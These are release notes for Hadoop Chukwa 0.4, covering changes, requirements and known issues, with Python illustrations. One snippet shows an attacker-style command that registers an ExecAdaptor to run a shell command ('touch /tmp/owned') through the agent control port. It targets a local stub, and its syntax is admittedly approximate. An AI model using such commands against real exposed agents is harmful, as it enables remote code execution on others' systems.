Release Notes - Hadoop Chukwa - Version 0.4
This is the second public release of Chukwa, a log analysis framework on top of Hadoop. Chukwa has been tested at scale and used in some production settings, and is reasonably robust and well behaved. For instructions on setting up Chukwa, see the administration guide and the rest of the Chukwa documentation.
The collection components of Chukwa -- adaptors, agents, and collectors -- have been fairly aggressively tested, and can be counted on to perform properly and recover from failures.
The demux pipeline has been cleaned up somewhat, and is now documented. See the programming guide for a discussion of how to customize demux for your purposes.
HICC, the visualization component, is still "beta" quality. It's been used successfully at multiple sites, but remains brittle; work is ongoing. Documentation is still sparse, and error reporting isn't always sufficiently clear.
Chukwa has not been extensively audited for security vulnerabilities, so run it only in trusted environments. Never run Chukwa as root: by default, the ExecAdaptor allows arbitrary remote code execution.
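To see why an exposed agent control port is dangerous, here is a minimal sketch of the kind of exchange involved. The `add ... ExecAdaptor ...` line models the agent's adaptor-registration syntax only loosely and should be treated as an assumption (as should the class's package path); a stub TCP server stands in for the agent so the example is self-contained. Consult the administration guide for the real control protocol.

```python
import socket
import threading

received = []

def stub_agent(server):
    # Stands in for the Chukwa agent's line-oriented control port.
    conn, _ = server.accept()
    with conn, conn.makefile() as f:
        received.append(f.readline().strip())

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))   # ephemeral port in place of the agent's
server.listen(1)
port = server.getsockname()[1]

t = threading.Thread(target=stub_agent, args=(server,))
t.start()

# What a remote attacker could send if the control port were reachable:
# register an ExecAdaptor, which runs an arbitrary shell command.
# (Command syntax and package path are assumptions for illustration.)
attack = ("add org.apache.hadoop.chukwa.datacollection.adaptor.ExecAdaptor "
          "Exec 60 /bin/touch /tmp/owned 0\n")
with socket.create_connection(("127.0.0.1", port)) as c:
    c.sendall(attack.encode())

t.join()
server.close()
print(received[0].split()[0])   # the "agent" accepted an add command
```

The point is that anything able to open a TCP connection to the agent can register adaptors, which is why disabling remote connections (see below) matters on untrusted networks.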
Important changes since last release
- The collection of shell scripts in /bin has been significantly pared down. For instance, instead of bin/agent, you should now say bin/chukwa agent.
- It is now possible to disable remote connections to the Chukwa agent. This makes Chukwa more suitable for use on a customer-facing deployment.
- Chukwa now includes an adaptor for reading data via a UDP port, the UDPAdaptor. This should facilitate integration with syslog and similar legacy tools.
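Any tool that can emit UDP datagrams can feed the UDPAdaptor. The sketch below sends an RFC 3164-style syslog line over UDP; the adaptor's listening port is deployment-specific, so a local receiver socket stands in for it here to keep the example self-contained.

```python
import socket

# Receiver socket standing in for the UDPAdaptor's listening port.
receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
receiver.bind(("127.0.0.1", 0))         # ephemeral port for the demo
port = receiver.getsockname()[1]

# RFC 3164-style syslog line: <priority>timestamp host tag: message
message = b"<134>Oct  4 12:00:00 node1 myapp: job finished"
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sender.sendto(message, ("127.0.0.1", port))

data, _ = receiver.recvfrom(4096)
print(data == message)                  # datagram arrives intact
sender.close()
receiver.close()
```

In a real deployment, pointing syslogd's UDP forwarding rule at the adaptor's host and port achieves the same thing without any custom code.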
There have been a number of bug fixes and code cleanups since the last release; check the changelog and JIRA for details.
Requirements
- Chukwa relies on Java 1.6, and requires Ant 1.7 to build.
- The back-end processing requires Hadoop 0.18+.
- Collecting Hadoop logs and metrics requires Hadoop 0.20+.
Known issues
- HICC defaults to assuming data is in UTC; if your machines run on local time, HICC graphs will not display properly until you change the HICC time zone. You can do this by clicking the small "gear" icon on the time-selection tool.
- As mentioned in the administration guide, the Pig down-sampling jobs should be run as an external command.
- The HDFSUsage script, which monitors HDFS usage under /user, needs to run as the special hdfs user to access the data; that user should have write access to $CHUKWA_LOG_DIR.
- System metrics collection may fail or be incomplete if your versions of sar and iostat do not match the ones that Chukwa expects. (See also CHUKWA-260)
- The data in a few of the Chukwa agent metrics tables (monthly, quarterly, yearly, decade) is transposed: the recordname column holds host data, and the host column holds recordname data.
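The HICC time-zone caveat above is easy to reproduce: a timestamp written by a machine running on local time, then read back under HICC's UTC assumption, lands hours away from where it belongs on the graph. A small sketch (the UTC-8 offset is just an example):

```python
from datetime import datetime, timezone, timedelta

# A machine in a UTC-8 zone logs an event at noon local time.
local_zone = timezone(timedelta(hours=-8))
logged = datetime(2010, 1, 15, 12, 0, tzinfo=local_zone)

# A UTC-assuming reader sees the same wall-clock digits as UTC.
misread = logged.replace(tzinfo=timezone.utc)

# The plotted point is off by the full zone offset.
print(logged - misread)   # -> 8:00:00
```

Setting the HICC time zone to match the machines' zone removes this skew.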